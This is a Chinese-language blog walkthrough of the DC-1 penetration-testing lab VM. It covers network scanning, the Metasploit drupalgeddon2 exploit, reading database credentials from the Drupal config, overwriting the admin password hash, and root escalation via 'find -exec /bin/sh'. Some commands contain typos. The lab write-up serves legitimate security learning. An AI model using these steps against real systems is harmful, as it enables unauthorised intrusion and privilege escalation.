Neos的渗透测试靶机练习——DC-1

简介: Neos的渗透测试靶机练习——DC-1

DC-1
一、实验环境
二、开始渗透

  1. 搜集信息
  2. flag1(CMS版本漏洞)
  3. flag2(CMS配置文件)
  4. flag3(数据库信息)
  5. flag4(靶机用户信息)
  6. flag5(find提权)
    三、总结(心里话(maybe quantui?))
    一、实验环境
    虚拟机软件:VirtualBox
    攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
    靶机:DC-1(网卡初始为仅主机模式,要有安全意识)
    1
    2
    3
    二、开始渗透
  7. 搜集信息
    输入sudo su,将kali切换到root权限;

输入ifconfig查询自身ip,即攻击机ip;

可以看到自身ip为192.168.56.101。
输入arp-scan -l扫描本网段存活主机,即靶机ip地址。

可以看到靶机ip为192.168.56.102,那192.168.56.100是什么呢?自己想一下。
输入nmap -p- 192.168.56.102扫描靶机所有端口开放情况。

可以看到端口22、80、111、45433是开放的。
尽量不爆破,实际渗透环境中有可能锁ip。
知道http服务是开的,打开浏览器输入192.168.56.102:80大致看一下界面。
命令行输入whatweb -v 192.168.56.102查询网站信息。

可以看到一些关键信息,其中Drupal是一个内容管理系统(CMS)。

  1. flag1(CMS版本漏洞)
    查查有没有版本漏洞,命令行输入msfconsole打开Metasploit
    1

输入search Drupal,查询出了一些版本漏洞,优先使用针对time最近且rank最高的漏洞的exp,即对应exploit/unix/webapp/drupal_drupalgeddon2这个漏洞的exp。

输入use exploit/unix/webapp/drupal_drupalgeddon2,

在metasploit中输入 set RHOSTS 192.168.56.102(靶机ip),
以及set LHOSTS 192.168.56.101(kali系统ip)

开始润,得到shell。

先输入shell,再输入ls,得到flag1.txt,输入cat flag1.txt查看

  1. flag2(CMS配置文件)
    由于这是一个CMS,可以找它的配置文件看一看。
    发现靶机上有python,先输入python -c 'imoprt pty; pty.spawn("/bin/bash")'转成交互式shell,方便操作。
    1
    2

找到Drupal的配置文件在/var/www/sites/defualt/settings.php,查看后获获得flag2.txt。

其中发现数据库信息。

  1. flag3(数据库信息)
    由上图,得知database,username, password。
    输入mysql -udbuser -pR0ck3t登录数据库。
    1
    2

输入show databases;查看有哪些数据库,

通过输入use drupaldb;切换到drupaldb,然后输入show tables;查看表名,发现users。

select*后发现比较乱乱,不过有属性名name和pass,
故输入select name,pass from users;,发现user和password。

密码经过加密,秉持攻击机靶机能不连公网就不连的原则,在本地上网查到drupal的密码修改方法。
cd /var/www后,执行./script/password-hash.sh drneos得到drneos的加密形式。

保存后面的hash字符串,再次进入mysql的drupaldb数据库,修改admin的密码,输入
update user set pass = '$S$DbGB6f5y0ESQdtMn1R61MBNKgHkQTaY5VSmOn41SLbCCek1IPE8M' where uid = 1;

至此,可以登录网站了。
在网站中输入用户名admin,密码deneos,进入drupal。

在Dashboard板块中发现flag3,点击得到flag3内容。

  1. flag4(靶机用户信息)
    命令行输入cat /etc/passwd查看用户信息,发现flag4。

本着能不爆破就不爆破的想法,找啊找,发现了flag4.txt

  1. flag5(find提权)
    最后阶段了,往往都是要提权,这里用find命令。
    输入find flag1.txt -exec "/bin/sh" \;拿到root权限。

进入/root目录,发现最终flag!。

至此,渗透结束。

三、总结(心里话(maybe quantui?))
经过上述的渗透过程,大家应该或多或少有一些想法,如果没有那些现成的工具(metasploit,whatweb,arp-scan等等),你怎么办?如果给你一个纯净的windows系统,什么软件也没有,然后再给你靶机让你去渗透,你能拿下它吗?你能短时间拿下吗?
说实话,我认为最精髓的不是如何熟练使用那些现有的工具,而是自己有那种根据渗透时不同阶段的需求去独立编写出扫描脚本和漏洞利用代码的能力。倘若你发现了漏洞,没有别人现成的脚本、exp,你怎么拿shell?怎么提权?自己开发?你有那个能力吗?越到后面与需要你的开发能力。
第一步是当好脚本小子,学习基本的渗透思路,工具看见一个积累一个,慢慢的,你会发现你越来越强。
最后,其实在实际环境中,社会工程学(钓鱼)和暴力破解(硬上)是最快最有效的,当我意识到这个现象的时候,说实话我的网安心有些动摇。
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/qq_38678845/article/details/135279582

目录
相关文章
|
10天前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
22 4
|
10天前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
13 2
|
11天前
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
|
1月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
30 0
|
3月前
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
|
3月前
|
安全
DC/AC电源模块为现代电子设备提供稳定的能源
DC/AC电源模块为现代电子设备提供稳定的能源
 DC/AC电源模块为现代电子设备提供稳定的能源
|
3月前
|
安全
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
|
1月前
|
芯片 网络架构
开关电源DC-DC电源应用
DC-DC指直流转直流电源(Direct Current)。是一种在直流电路中将一个电压值的电能变为另一个电压值的电能的装置。如,通过一个转换器能将一个直流电压(5.0V)转换成其他的直流电压(1.5V或12.0V),我们称这个转换器为DC-DC转换器,或称之为开关电源或开关调整器。 DC-DC转换器一般由控制芯片,电感线圈,二极管,三极管,电容器构成。在讨论DC-DC转换器的性能时,如果单针对控制芯片,是不能判断其优劣的。其外围电路的元器件特性,和基板的布线方式等,能改变电源电路的性能,因此,应进行综合判断。 DC-DC转换器的使用有利于简化电源电路设计,缩短研制周期,实现最佳指标等,被
44 5
|
3月前
|
安全
BOSHIDA 使用DC/AC电源模块时需要注意的事项
BOSHIDA 使用DC/AC电源模块时需要注意的事项
BOSHIDA  使用DC/AC电源模块时需要注意的事项
|
3月前
|
安全
DC/AC电源模块在工业科技中重要的作用
DC/AC电源模块在工业科技中发挥着重要的作用
DC/AC电源模块在工业科技中重要的作用